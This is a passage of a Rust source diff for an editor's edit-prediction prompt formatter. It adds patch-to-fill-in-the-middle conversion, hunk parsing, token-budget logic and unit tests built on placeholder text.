suffix_offset = if suffix_context.is_empty() { + context.len() + } else { + find_substring_at_line_boundary(&context[prefix_offset..], suffix_context) + .ok_or_else(|| anyhow!("could not locate suffix lines"))? + + prefix_offset + }; + + let edit_range = prefix_offset..suffix_offset; + return Ok((edit_range, new_text.to_string())); + } + + fn find_substring_at_line_boundary(haystack: &str, needle: &str) -> Option { + if needle.is_empty() { + return Some(0); + } + + haystack.match_indices(needle).find_map(|(offset, _)| { + let matched_line_start = offset == 0 || haystack[..offset].ends_with('\n'); + matched_line_start.then_some(offset) + }) + } + + /// Convert a unified diff patch into the variable-edit output format. + /// + /// Parses `patch` as a unified diff against `old_text` and produces model + /// output with context lines surrounding `<|fim_middle|>` / `<|fim_suffix|>` + /// delimiters. The diff is resolved by content matching rather than line + /// numbers. + pub fn patch_to_variable_edit_output( + old_text: &str, + patch: &str, + cursor_offset: Option, + ) -> Result { + // Parse the unified diff into hunks. Each hunk has an `old_context` + // string (context + deleted lines interleaved in order) and a list of + // edits expressed as byte ranges within that context plus replacement + // text. + let hunks = parse_hunks(patch); + if hunks.is_empty() { + return Ok(String::new()); + } + + // Apply each hunk by finding its old_context in the text and + // performing the edits. We search forward from where the previous + // hunk ended so that hunks are applied in order. + let mut new_text = old_text.to_string(); + let mut search_from: usize = 0; + let mut first_hunk_pos: Option = None; + + for hunk in &hunks { + let context_pos = new_text[search_from..] + .find(&hunk.old_context) + .map(|pos| pos + search_from) + .ok_or_else(|| anyhow::anyhow!("could not locate hunk context in text"))?; + + if first_hunk_pos.is_none() { + first_hunk_pos = Some(context_pos); + } + + // Apply edits in reverse order so byte offsets remain valid. + for edit in hunk.edits.iter().rev() { + let abs_start = context_pos + edit.range.start; + let abs_end = context_pos + edit.range.end; + new_text.replace_range(abs_start..abs_end, &edit.text); + } + + // Advance past this hunk's region in the (now modified) text. + let new_region_len: usize = + hunk.edits.iter().fold(hunk.old_context.len(), |len, edit| { + len + edit.text.len() - (edit.range.end - edit.range.start) + }); + search_from = context_pos + new_region_len; + } + + // Now we have old_text and new_text. Find the changed line range by + // comparing them. + let old_lines: Vec<&str> = old_text.lines().collect(); + let new_lines: Vec<&str> = new_text.lines().collect(); + + // Find first differing line. + let first_changed_row = old_lines + .iter() + .zip(new_lines.iter()) + .position(|(a, b)| a != b) + .unwrap_or_else(|| old_lines.len().min(new_lines.len())); + + // Find last differing line (from the end). + let max_suffix = old_lines.len().min(new_lines.len()) - first_changed_row; + let common_suffix = old_lines + .iter() + .rev() + .zip(new_lines.iter().rev()) + .take(max_suffix) + .take_while(|(a, b)| a == b) + .count(); + + let old_end = old_lines.len() - common_suffix; + let new_end = new_lines.len() - common_suffix; + + if first_changed_row == old_end && first_changed_row == new_end { + return Ok(String::new()); + } - let suffix_tokens = estimate_tokens(suffix_section.len()); - let cursor_prefix_tokens = estimate_tokens(cursor_prefix_section.len()); - let budget_after_cursor = max_tokens.saturating_sub(suffix_tokens + cursor_prefix_tokens); + // Build the replacement text from new_lines[first_diff..new_end]. + let mut merged_new_text = String::new(); + for line in &new_lines[first_changed_row..new_end] { + merged_new_text.push_str(line); + merged_new_text.push('\n'); + } - let edit_history_section = super::format_edit_history_within_budget( - events, - FILE_MARKER, - "edit_history", - budget_after_cursor, - ); - let edit_history_tokens = estimate_tokens(edit_history_section.len()); - let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens); + // cursor_offset is relative to the first hunk's new content in + // new_text. Translate it to an offset within merged_new_text, which + // only contains lines first_diff..new_end of new_text. + if let Some(hunk_offset) = cursor_offset { + let hunk_start = first_hunk_pos.unwrap_or(0); + let absolute_pos = hunk_start + hunk_offset; - let related_files_section = super::format_related_files_within_budget( - related_files, - FILE_MARKER, - "", - budget_after_edit_history, - ); + // Byte offset where first_diff starts in new_text. + let merged_start: usize = new_lines[..first_changed_row] + .iter() + .map(|line| line.len() + 1) + .sum(); - let mut prompt = String::new(); - prompt.push_str(&suffix_section); - prompt.push_str(FIM_PREFIX); - prompt.push_str(&related_files_section); - if !related_files_section.is_empty() { - prompt.push('\n'); + if absolute_pos >= merged_start { + let relative_offset = absolute_pos - merged_start; + if relative_offset <= merged_new_text.len() { + merged_new_text.insert_str(relative_offset, CURSOR_MARKER); + } + } } - prompt.push_str(&edit_history_section); - if !edit_history_section.is_empty() { - prompt.push('\n'); + + // Build output with 2 lines of context above and below. + let context_lines_count = 2; + let mut prefix_start = first_changed_row.saturating_sub(context_lines_count); + let mut suffix_end = (old_end + context_lines_count).min(old_lines.len()); + + fn count_matches(line_range: Range, lines: &[&str]) -> usize { + let pattern = &lines[line_range]; + let pattern_len = pattern.len(); + + let mut count = 0; + for offset in 0..=lines.len() - pattern_len { + if &lines[offset..offset + pattern_len] == pattern { + count += 1; + } + } + count } - prompt.push_str(&cursor_prefix_section); - prompt.push_str(FIM_MIDDLE); - prompt + + // Expand prefix and suffix until they are unique + while prefix_start > 0 { + if count_matches(prefix_start..first_changed_row, &old_lines) > 1 { + prefix_start -= 1; + } else { + break; + } + } + while suffix_end < old_lines.len() { + if count_matches(old_end..suffix_end, &old_lines) > 1 { + suffix_end += 1; + } else { + break; + } + } + + let mut output = String::new(); + for line in &old_lines[prefix_start..first_changed_row] { + output.push_str(line); + output.push('\n'); + } + output.push_str("<|fim_middle|>\n"); + output.push_str(&merged_new_text); + output.push_str("<|fim_suffix|>\n"); + for line in &old_lines[old_end..suffix_end] { + output.push_str(line); + output.push('\n'); + } + + Ok(output) } - fn build_suffix_section(context: &str, editable_range: &Range) -> String { - let mut section = String::new(); - section.push_str(FIM_SUFFIX); - section.push_str(&context[editable_range.end..]); - if !section.ends_with('\n') { - section.push('\n'); + struct ParsedHunk { + old_context: String, + edits: Vec, + } + + struct ParsedEdit { + range: Range, + text: String, + } + + /// Parse a unified diff into content-based hunks. Each hunk contains an + /// `old_context` string (context lines + deleted lines, which together + /// form the text that should be found in the original) and a list of edits + /// expressed as byte ranges within that context. + fn parse_hunks(patch: &str) -> Vec { + let mut hunks = Vec::new(); + let mut current: Option = None; + + for line in patch.lines() { + if line.starts_with("@@") { + if let Some(hunk) = current.take() { + if !hunk.old_context.is_empty() || !hunk.edits.is_empty() { + hunks.push(hunk); + } + } + current = Some(ParsedHunk { + old_context: String::new(), + edits: Vec::new(), + }); + } else if line.starts_with("---") || line.starts_with("+++") { + continue; + } else if let Some(hunk) = &mut current { + if let Some(added) = line.strip_prefix('+') { + let pos = hunk.old_context.len(); + if let Some(last_edit) = hunk.edits.last_mut() { + if last_edit.range.end == pos { + writeln!(&mut last_edit.text, "{added}").ok(); + continue; + } + } + hunk.edits.push(ParsedEdit { + range: pos..pos, + text: format!("{added}\n"), + }); + } else if let Some(removed) = line.strip_prefix('-') { + let start = hunk.old_context.len(); + writeln!(&mut hunk.old_context, "{removed}").ok(); + let end = hunk.old_context.len(); + if let Some(last_edit) = hunk.edits.last_mut() { + if last_edit.range.end == start { + last_edit.range.end = end; + continue; + } + } + hunk.edits.push(ParsedEdit { + range: start..end, + text: String::new(), + }); + } else { + let ctx = line.strip_prefix(' ').unwrap_or(line); + writeln!(&mut hunk.old_context, "{ctx}").ok(); + } + } } - section + + if let Some(hunk) = current { + if !hunk.old_context.is_empty() || !hunk.edits.is_empty() { + hunks.push(hunk); + } + } + + hunks } - fn build_cursor_prefix_section( - path: &Path, - context: &str, - editable_range: &Range, - cursor_offset: usize, - ) -> String { - let mut section = String::new(); - let path_str = path.to_string_lossy(); - write!(section, "{}{}\n", FILE_MARKER, path_str).ok(); + #[cfg(test)] + mod tests { + use super::*; + use indoc::indoc; + + #[test] + fn test_apply_variable_edit() { + struct Case { + name: &'static str, + original: &'static str, + model_output: &'static str, + expected: &'static str, + } - section.push_str(&context[..editable_range.start]); - section.push_str(START_MARKER); - section.push_str(&context[editable_range.start..cursor_offset]); - section.push_str(CURSOR_MARKER); - section.push_str(&context[cursor_offset..editable_range.end]); - if !section.ends_with('\n') { - section.push('\n'); + let cases = [ + Case { + name: "simple_single_line_replacement", + original: indoc! {" + zero + one + two + three + four + five + "}, + model_output: indoc! {" + two + <|fim_middle|> + THREE + <|fim_suffix|> + four + "}, + expected: indoc! {" + zero + one + two + THREE + four + five + "}, + }, + Case { + name: "multi_line_replacement", + original: indoc! {" + a + b + c + d + e + "}, + model_output: indoc! {" + a + <|fim_middle|> + B + C + D + <|fim_suffix|> + e + "}, + expected: indoc! {" + a + B + C + D + e + "}, + }, + Case { + name: "insertion_between_existing_lines", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + a + <|fim_middle|> + X + <|fim_suffix|> + b + "}, + expected: indoc! {" + a + X + b + c + "}, + }, + Case { + name: "deletion", + original: indoc! {" + a + b + c + d + "}, + model_output: indoc! {" + a + <|fim_middle|> + <|fim_suffix|> + c + "}, + expected: indoc! {" + a + c + d + "}, + }, + Case { + name: "replacement_at_start_no_prefix_context", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + <|fim_middle|> + X + <|fim_suffix|> + b + "}, + expected: indoc! {" + X + b + c + "}, + }, + Case { + name: "replacement_at_end_no_suffix_context", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + b + <|fim_middle|> + Z + <|fim_suffix|> + "}, + expected: indoc! {" + a + b + Z + "}, + }, + Case { + name: "context_with_trailing_newline_is_preserved", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + a + <|fim_middle|> + B + <|fim_suffix|> + c + "}, + expected: indoc! {" + a + B + c + "}, + }, + Case { + name: "cursor_marker_passes_through_untouched", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + a + <|fim_middle|> + B<|user_cursor|>B + <|fim_suffix|> + c + "}, + expected: indoc! {" + a + B<|user_cursor|>B + c + "}, + }, + Case { + name: "multiple_prefix_context_lines", + original: indoc! {" + a + b + c + d + e + "}, + model_output: indoc! {" + b + c + <|fim_middle|> + D + <|fim_suffix|> + e + "}, + expected: indoc! {" + a + b + c + D + e + "}, + }, + ]; + + for case in cases { + let (edit_range, replacement) = + apply_variable_edit(case.original, case.model_output).unwrap(); + let mut edited = case.original.to_string(); + edited.replace_range(edit_range, &replacement); + assert_eq!(edited, case.expected, "{}", case.name); + } + } + + #[test] + fn test_patch_to_variable_edit() { + struct Case { + name: &'static str, + old: &'static str, + patch: &'static str, + cursor_offset: Option, + expected_variable_edit: &'static str, + expected_after_apply: &'static str, + } + + let cases = [ + Case { + name: "simple_replacement", + old: indoc! {" + zero + one + two + three + four + five + "}, + patch: indoc! {" + @@ -3,3 +3,3 @@ + two + -three + +THREE + four + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + one + two + <|fim_middle|> + THREE + <|fim_suffix|> + four + five + "}, + expected_after_apply: indoc! {" + zero + one + two + THREE + four + five + "}, + }, + Case { + name: "insertion", + old: indoc! {" + a + b + c + d + e + "}, + patch: indoc! {" + @@ -2,0 +3,1 @@ + b + +X + c + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + a + b + <|fim_middle|> + X + <|fim_suffix|> + c + d + "}, + expected_after_apply: indoc! {" + a + b + X + c + d + e + "}, + }, + Case { + name: "deletion", + old: indoc! {" + a + b + c + d + e + "}, + patch: indoc! {" + @@ -2,3 +2,2 @@ + b + -c + d + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + a + b + <|fim_middle|> + <|fim_suffix|> + d + e + "}, + expected_after_apply: indoc! {" + a + b + d + e + "}, + }, + Case { + name: "edit_near_start", + old: indoc! {" + first + second + third + fourth + "}, + patch: indoc! {" + @@ -1,1 +1,1 @@ + -first + +FIRST + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + <|fim_middle|> + FIRST + <|fim_suffix|> + second + third + "}, + expected_after_apply: indoc! {" + FIRST + second + third + fourth + "}, + }, + Case { + name: "edit_near_end", + old: indoc! {" + first + second + third + fourth + "}, + patch: indoc! {" + @@ -4,1 +4,1 @@ + -fourth + +FOURTH + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + second + third + <|fim_middle|> + FOURTH + <|fim_suffix|> + "}, + expected_after_apply: indoc! {" + first + second + third + FOURTH + "}, + }, + Case { + name: "cursor_at_start_of_replacement", + old: indoc! {" + zero + one + two + three + four + five + "}, + patch: indoc! {" + @@ -3,3 +3,3 @@ + two + -three + +THREE + four + "}, + cursor_offset: Some(4), + expected_variable_edit: indoc! {" + one + two + <|fim_middle|> + <|user_cursor|>THREE + <|fim_suffix|> + four + five + "}, + expected_after_apply: indoc! {" + zero + one + two + <|user_cursor|>THREE + four + five + "}, + }, + Case { + name: "cursor_in_middle_of_replacement", + old: indoc! {" + zero + one + two + three + four + five + "}, + patch: indoc! {" + @@ -3,3 +3,3 @@ + two + -three + +THREE + four + "}, + cursor_offset: Some(6), + expected_variable_edit: indoc! {" + one + two + <|fim_middle|> + TH<|user_cursor|>REE + <|fim_suffix|> + four + five + "}, + expected_after_apply: indoc! {" + zero + one + two + TH<|user_cursor|>REE + four + five + "}, + }, + Case { + name: "expands_context_when_two_lines_not_unique_before_and_after", + old: indoc! {" + one + a + b + c + d + two + a + b + c + d + three + a + b + c + d + four + "}, + patch: indoc! {" + @@ -4,5 +4,5 @@ + two + a + b + -c + +C + d + three + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + two + a + b + <|fim_middle|> + C + <|fim_suffix|> + d + three + "}, + expected_after_apply: indoc! {" + one + a + b + c + d + two + a + b + C + d + three + a + b + c + d + four + "}, + }, + Case { + name: "expands_context_when_two_lines_not_unique_before_and_after", + old: indoc! {" + { + { + one(); + } + } + { + { + two(); + } + } + { + { + three(); + } + } + { + { + four(); + } + } + "}, + patch: indoc! {" + @@ -4,5 +4,5 @@ + { + - two(); + + TWO(); + } + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + one(); + } + } + { + { + <|fim_middle|> + TWO(); + <|fim_suffix|> + } + } + { + { + three(); + "}, + expected_after_apply: indoc! {" + { + { + one(); + } + } + { + { + TWO(); + } + } + { + { + three(); + } + } + { + { + four(); + } + } + "}, + }, + ]; + + for case in cases { + let output = + patch_to_variable_edit_output(case.old, case.patch, case.cursor_offset) + .unwrap_or_else(|error| { + panic!("failed converting patch for {}: {error}", case.name) + }); + assert_eq!( + output, case.expected_variable_edit, + "patch->variable_edit mismatch for {}", + case.name + ); + + let (edit_range, replacement) = apply_variable_edit(case.old, &output) + .unwrap_or_else(|error| { + panic!("failed applying variable_edit for {}: {error}", case.name) + }); + let mut edited_by_variable_edit = case.old.to_string(); + edited_by_variable_edit.replace_range(edit_range, &replacement); + assert_eq!( + edited_by_variable_edit, case.expected_after_apply, + "variable_edit apply mismatch for {}", + case.name + ); + + let (expected_edit_range, expected_replacement) = + apply_variable_edit(case.old, case.expected_variable_edit).unwrap_or_else( + |error| { + panic!( + "failed applying expected variable_edit for {}: {error}", + case.name + ) + }, + ); + let mut edited_by_expected_variable_edit = case.old.to_string(); + edited_by_expected_variable_edit + .replace_range(expected_edit_range, &expected_replacement); + assert_eq!( + edited_by_expected_variable_edit, case.expected_after_apply, + "expected variable_edit apply mismatch for {}", + case.name + ); + } + } + + #[test] + fn test_write_cursor_excerpt_section() { + let path = Path::new("test.rs"); + let context = "fn main() {\n hello();\n}\n"; + let cursor_offset = 17; + let mut prompt = String::new(); + write_cursor_excerpt_section(&mut prompt, path, context, cursor_offset); + assert_eq!( + prompt, + "<|file_sep|>test.rs\nfn main() {\n h<|user_cursor|>ello();\n}\n<|fim_prefix|>\n" + ); } - section.push_str(SEPARATOR); - section } } @@ -995,7 +4320,13 @@ pub mod zeta1 { /// Formats events in zeta1 style (oldest first). fn format_zeta1_events(events: &[Arc]) -> String { let mut result = String::new(); - for event in events { + for event in + events + .iter() + .skip(events.len().saturating_sub(max_edit_event_count_for_format( + &ZetaFormat::V0114180EditableRegion, + ))) + { let event_string = format_zeta1_event(event); if event_string.is_empty() { continue; @@ -1153,18 +4484,60 @@ mod tests { events: Vec, related_files: Vec, ) -> ZetaPromptInput { + let context_range = 0..cursor_excerpt.len(); ZetaPromptInput { cursor_path: Path::new("test.rs").into(), cursor_excerpt: cursor_excerpt.into(), - editable_range_in_excerpt: editable_range, cursor_offset_in_excerpt: cursor_offset, excerpt_start_row: None, events: events.into_iter().map(Arc::new).collect(), - related_files, - excerpt_ranges: None, - preferred_model: None, + related_files: Some(related_files), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: editable_range.clone(), + editable_180: editable_range.clone(), + editable_350: editable_range, + editable_150_context_350: context_range.clone(), + editable_180_context_350: context_range.clone(), + editable_350_context_150: context_range, + ..Default::default() + }, + syntax_ranges: None, + experiment: None, + in_open_source_repo: false, + can_collect_data: false, + repo_url: None, + } + } + + fn make_input_with_context_range( + excerpt: &str, + editable_range: Range, + context_range: Range, + cursor_offset: usize, + ) -> ZetaPromptInput { + ZetaPromptInput { + cursor_path: Path::new("test.rs").into(), + cursor_excerpt: excerpt.into(), + cursor_offset_in_excerpt: cursor_offset, + excerpt_start_row: None, + events: vec![], + related_files: Some(vec![]), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: editable_range.clone(), + editable_180: editable_range.clone(), + editable_350: editable_range, + editable_150_context_350: context_range.clone(), + editable_180_context_350: context_range.clone(), + editable_350_context_150: context_range, + ..Default::default() + }, + syntax_ranges: None, + experiment: None, in_open_source_repo: false, can_collect_data: false, + repo_url: None, } } @@ -1191,8 +4564,12 @@ mod tests { } } - fn format_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> String { - format_zeta_prompt_with_budget(input, ZetaFormat::V0114180EditableRegion, max_tokens) + fn format_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> Option { + format_prompt_with_budget_for_format(input, ZetaFormat::V0114180EditableRegion, max_tokens) + } + + fn budget_with_margin(requested_tokens: usize) -> usize { + ((requested_tokens as f64) / 0.9).ceil() as usize } #[test] @@ -1206,7 +4583,7 @@ mod tests { ); assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>related.rs fn helper() {} @@ -1225,6 +4602,7 @@ mod tests { suffix <|fim_middle|>updated "#} + .to_string() ); } @@ -1236,18 +4614,18 @@ mod tests { 2, vec![make_event("a.rs", "-x\n+y\n")], vec![ - make_related_file("r1.rs", "a\n"), - make_related_file("r2.rs", "b\n"), + make_related_file("r1.rs", "aaaaaaa\n"), + make_related_file("r2.rs", "bbbbbbb\n"), ], ); assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>r1.rs - a + aaaaaaa <|file_sep|>r2.rs - b + bbbbbbb <|file_sep|>edit history --- a/a.rs +++ b/a.rs @@ -1260,15 +4638,18 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); assert_eq!( - format_with_budget(&input, 50), - indoc! {r#" - <|file_sep|>r1.rs - a - <|file_sep|>r2.rs - b + format_with_budget(&input, budget_with_margin(55)), + Some( + indoc! {r#" + <|file_sep|>edit history + --- a/a.rs + +++ b/a.rs + -x + +y <|file_sep|>test.rs <|fim_prefix|> <|fim_middle|>current @@ -1276,6 +4657,8 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() + ) ); } @@ -1311,7 +4694,7 @@ mod tests { ); assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>big.rs first excerpt @@ -1326,10 +4709,11 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); assert_eq!( - format_with_budget(&input, 50), + format_with_budget(&input, budget_with_margin(50)).unwrap(), indoc! {r#" <|file_sep|>big.rs first excerpt @@ -1341,6 +4725,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); } @@ -1379,7 +4764,7 @@ mod tests { // With large budget, both files included; rendered in stable lexicographic order. assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>file_a.rs low priority content @@ -1392,6 +4777,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); // With tight budget, only file_b (lower order) fits. @@ -1399,7 +4785,7 @@ mod tests { // file_b header (7) + excerpt (7) = 14 tokens, which fits. // file_a would need another 14 tokens, which doesn't fit. assert_eq!( - format_with_budget(&input, 52), + format_with_budget(&input, budget_with_margin(52)).unwrap(), indoc! {r#" <|file_sep|>file_b.rs high priority content @@ -1410,6 +4796,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); } @@ -1451,7 +4838,7 @@ mod tests { // With large budget, all three excerpts included. assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>mod.rs mod header @@ -1466,11 +4853,12 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); // With tight budget, only order<=1 excerpts included (header + important fn). assert_eq!( - format_with_budget(&input, 55), + format_with_budget(&input, budget_with_margin(55)).unwrap(), indoc! {r#" <|file_sep|>mod.rs mod header @@ -1484,6 +4872,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); } @@ -1498,7 +4887,7 @@ mod tests { ); assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>edit history --- a/old.rs @@ -1514,10 +4903,11 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); assert_eq!( - format_with_budget(&input, 55), + format_with_budget(&input, 60).unwrap(), indoc! {r#" <|file_sep|>edit history --- a/new.rs @@ -1530,6 +4920,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); } @@ -1543,25 +4934,19 @@ mod tests { vec![make_related_file("related.rs", "helper\n")], ); - assert_eq!( - format_with_budget(&input, 30), - indoc! {r#" - <|file_sep|>test.rs - <|fim_prefix|> - <|fim_middle|>current - fn <|user_cursor|>main() {} - <|fim_suffix|> - <|fim_middle|>updated - "#} - ); + assert!(format_with_budget(&input, 30).is_none()) } + #[track_caller] fn format_seed_coder(input: &ZetaPromptInput) -> String { - format_zeta_prompt_with_budget(input, ZetaFormat::V0211SeedCoder, 10000) + format_prompt_with_budget_for_format(input, ZetaFormat::V0211SeedCoder, 10000) + .expect("seed coder prompt formatting should succeed") } + #[track_caller] fn format_seed_coder_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> String { - format_zeta_prompt_with_budget(input, ZetaFormat::V0211SeedCoder, max_tokens) + format_prompt_with_budget_for_format(input, ZetaFormat::V0211SeedCoder, max_tokens) + .expect("seed coder prompt formatting should succeed") } #[test] @@ -1597,6 +4982,34 @@ mod tests { ); } + #[test] + fn test_v0317_formats_prompt_with_many_related_files() { + let related_files = (0..900) + .map(|index| { + make_related_file( + &format!("related_{index}.rs"), + "fn helper() {\n let value = 1;\n}\n", + ) + }) + .collect(); + + let input = make_input( + "code", + 0..4, + 2, + vec![make_event("a.rs", "-x\n+y\n")], + related_files, + ); + + let prompt = + format_prompt_with_budget_for_format(&input, ZetaFormat::V0317SeedMultiRegions, 4096); + + assert!(prompt.is_some()); + let prompt = prompt.expect("v0317 should produce a prompt under high related-file count"); + assert!(prompt.contains("test.rs")); + assert!(prompt.contains(CURSOR_MARKER)); + } + #[test] fn test_seed_coder_no_context() { let input = make_input("before\nmiddle\nafter", 7..13, 10, vec![], vec![]); @@ -1646,17 +5059,22 @@ mod tests { <[fim-middle]>"#} ); - // With tight budget, context is dropped but cursor section remains assert_eq!( - format_seed_coder_with_budget(&input, 30), + format_prompt_with_budget_for_format(&input, ZetaFormat::V0211SeedCoder, 24), + None + ); + + assert_eq!( + format_seed_coder_with_budget(&input, 40), indoc! {r#" <[fim-suffix]> <[fim-prefix]>test.rs <<<<<<< CURRENT co<|user_cursor|>de ======= - <[fim-middle]>"#} - ); + <[fim-middle]>"# + } + ) } #[test] @@ -1707,36 +5125,20 @@ mod tests { <[fim-middle]>"#} ); - // With tight budget, only high_prio included. - // Cursor sections cost 25 tokens, so budget 44 leaves 19 for related files. - // high_prio header (7) + excerpt (3) = 10, fits. low_prio would add 10 more = 20 > 19. - assert_eq!( - format_seed_coder_with_budget(&input, 44), - indoc! {r#" - <[fim-suffix]> - <[fim-prefix]>high_prio.rs - high prio - - test.rs - <<<<<<< CURRENT - co<|user_cursor|>de - ======= - <[fim-middle]>"#} - ); - } - - #[test] - fn test_seed_coder_clean_output() { - let output_with_marker = "new code\n>>>>>>> UPDATED\n"; - let output_without_marker = "new code\n"; - - assert_eq!( - clean_zeta2_model_output(output_with_marker, ZetaFormat::V0211SeedCoder), - "new code\n" - ); + // With tight budget under the generic heuristic, context is dropped but the + // minimal cursor section still fits. assert_eq!( - clean_zeta2_model_output(output_without_marker, ZetaFormat::V0211SeedCoder), - "new code\n" + format_prompt_with_budget_for_format(&input, ZetaFormat::V0211SeedCoder, 44), + Some( + indoc! {r#" + <[fim-suffix]> + <[fim-prefix]>test.rs + <<<<<<< CURRENT + co<|user_cursor|>de + ======= + <[fim-middle]>"#} + .to_string() + ) ); } @@ -1746,15 +5148,25 @@ mod tests { let input = ZetaPromptInput { cursor_path: Path::new("src/main.rs").into(), cursor_excerpt: excerpt.into(), - editable_range_in_excerpt: 15..41, cursor_offset_in_excerpt: 30, excerpt_start_row: Some(0), events: vec![Arc::new(make_event("other.rs", "-old\n+new\n"))], - related_files: vec![], - excerpt_ranges: None, - preferred_model: None, + related_files: Some(vec![]), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: 15..41, + editable_180: 15..41, + editable_350: 15..41, + editable_150_context_350: 0..excerpt.len(), + editable_180_context_350: 0..excerpt.len(), + editable_350_context_150: 0..excerpt.len(), + ..Default::default() + }, + syntax_ranges: None, + experiment: None, in_open_source_repo: false, can_collect_data: false, + repo_url: None, }; let prompt = zeta1::format_zeta1_from_input(&input, 15..41, 0..excerpt.len()); @@ -1801,15 +5213,25 @@ mod tests { let input = ZetaPromptInput { cursor_path: Path::new("src/main.rs").into(), cursor_excerpt: excerpt.into(), - editable_range_in_excerpt: 0..28, cursor_offset_in_excerpt: 15, excerpt_start_row: Some(10), events: vec![], - related_files: vec![], - excerpt_ranges: None, - preferred_model: None, + related_files: Some(vec![]), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: 0..28, + editable_180: 0..28, + editable_350: 0..28, + editable_150_context_350: 0..28, + editable_180_context_350: 0..28, + editable_350_context_150: 0..28, + ..Default::default() + }, + syntax_ranges: None, + experiment: None, in_open_source_repo: false, can_collect_data: false, + repo_url: None, }; let prompt = zeta1::format_zeta1_from_input(&input, 0..28, 0..28); @@ -1851,15 +5273,25 @@ mod tests { let input = ZetaPromptInput { cursor_path: Path::new("test.rs").into(), cursor_excerpt: excerpt.into(), - editable_range_in_excerpt: editable_range.clone(), cursor_offset_in_excerpt: 25, excerpt_start_row: Some(0), events: vec![], - related_files: vec![], - excerpt_ranges: None, - preferred_model: None, + related_files: Some(vec![]), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: editable_range.clone(), + editable_180: editable_range.clone(), + editable_350: editable_range.clone(), + editable_150_context_350: context_range.clone(), + editable_180_context_350: context_range.clone(), + editable_350_context_150: context_range.clone(), + ..Default::default() + }, + syntax_ranges: None, + experiment: None, in_open_source_repo: false, can_collect_data: false, + repo_url: None, }; let prompt = zeta1::format_zeta1_from_input(&input, editable_range, context_range); @@ -1895,6 +5327,87 @@ mod tests { ); } + #[test] + fn test_max_event_count() { + fn make_numbered_event(index: usize) -> Event { + return make_event( + &format!("event-{index}.rs"), + &format!("-old-{index}\n+new-{index}\n"), + ); + } + let input = make_input( + "x", + 0..1, + 0, + (0..3).map(make_numbered_event).collect(), + vec![], + ); + + let edit_history_section = format_edit_history_within_budget( + &input.events, + "<|file_sep|>", + "edit history", + usize::MAX, + 5, + ); + + assert_eq!( + &edit_history_section, + indoc!( + " + <|file_sep|>edit history + --- a/event-0.rs + +++ b/event-0.rs + -old-0 + +new-0 + --- a/event-1.rs + +++ b/event-1.rs + -old-1 + +new-1 + --- a/event-2.rs + +++ b/event-2.rs + -old-2 + +new-2 + " + ) + ); + + let edit_history_section = format_edit_history_within_budget( + &input.events, + "<|file_sep|>", + "edit history", + usize::MAX, + 2, + ); + + assert_eq!( + &edit_history_section, + indoc!( + " + <|file_sep|>edit history + --- a/event-1.rs + +++ b/event-1.rs + -old-1 + +new-1 + --- a/event-2.rs + +++ b/event-2.rs + -old-2 + +new-2 + " + ) + ); + + let edit_history_section = format_edit_history_within_budget( + &input.events, + "<|file_sep|>", + "edit history", + usize::MAX, + 0, + ); + + assert_eq!(&edit_history_section, ""); + } + #[test] fn test_clean_zeta1_model_output_basic() { let output = indoc! {" @@ -1939,4 +5452,111 @@ mod tests { let cleaned = zeta1::clean_zeta1_model_output(output).unwrap(); assert_eq!(cleaned, ""); } + + fn apply_edit(excerpt: &str, parsed_output: &ParsedOutput) -> String { + let mut result = excerpt.to_string(); + result.replace_range( + parsed_output.range_in_excerpt.clone(), + &parsed_output.new_editable_region, + ); + result + } + + #[test] + fn test_parse_zeta2_model_output() { + let excerpt = "before ctx\nctx start\neditable old\nctx end\nafter ctx\n"; + let context_start = excerpt.find("ctx start").unwrap(); + let context_end = excerpt.find("after ctx").unwrap(); + let editable_start = excerpt.find("editable old").unwrap(); + let editable_end = editable_start + "editable old\n".len(); + let input = make_input_with_context_range( + excerpt, + editable_start..editable_end, + context_start..context_end, + editable_start, + ); + + let output = parse_zeta2_model_output( + "editable new\n>>>>>>> UPDATED\n", + ZetaFormat::V0131GitMergeMarkersPrefix, + &input, + 